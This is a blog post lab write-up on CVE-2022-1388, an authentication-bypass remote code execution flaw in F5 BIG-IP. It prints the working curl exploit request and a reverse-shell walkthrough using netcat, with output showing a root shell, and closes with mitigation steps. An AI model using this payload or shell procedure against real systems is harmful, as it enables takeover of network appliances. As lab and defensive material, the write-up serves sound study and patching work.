So yeah, I’m late to the party on this one. The latest in a long list of alarming software bugs in F5’s BIG-IP software is CVE-2022-1388. This time an attacker can send an unauthenticated post to the management interface (or self ip address) and execute remote code as root. Did I mention this was bad? 😛
To detail my point – here is the http POST that has been doing the rounds on twitter:
$ curl -i -s -k -X $'POST' \
-H $'Host: :8443' \
-H $'Authorization: Basic YWRtaW46' \
-H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
-H $'Content-Length: 52' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
$'https://:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
Ouch.

Lets get to labbing this one. As always make sure you have permission or better still setup a private lab like I do:

Lab
For this lab I am using a F5 Big-IP 13.x VM which is vulnerable to CVE-2022-1388
VM has a management interface (192.168.1.1/24) and a self ip interface (192.168.1.100/24).
The attacker VM is running Kali and is IP 192.168.1.10.
1. Download the exploit with wget from here.
2. Chmod the exploit file:
chmod +x CVE-2022-1388.py
2. Open up a terminal window on Kali and setup your netcat listener:
nc -lvp 4444
3. Open up another terminal and setup the exploit, press enter to execute:
python3 CVE-2022-1388.py https://192.168.1.100/ 192.168.1.10 4444
Be sure to use a trailing slash on the vulnerable F5 target
4. Profit! Switch back to your netcat window and you should be root:
$ nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.100.
Ncat: Connection from 192.168.1.100:53854.
bash: no job control in this shell
[@f5-demo:Active:Standalone] restjavad # whoami
whoami
root
[@f5-demo:Active:Standalone] restjavad #

F5 Netcat
Keep in mind in this example, the F5 Self IP was targeted. I didn’t even need access to the mgmt interface. It’s important to point that out as both scenarios should be considering when securing the F5 Big-IP appliance.

Mitigation
1. Patch the appliance for the version of Big-IP you are running as per the KB here.
2. Limit the IP addresses that can talk to the management interface via https and ssh.
3. Disable layer 4 ports on the self-ip addresses if you are not using them. Also known as port lockdown in F5 terms.
No need for me to detail how to do these tasks, the links above show you in full detail and are straight forward to follow for anyone who has a moderate level of experience with F5 Big-IP.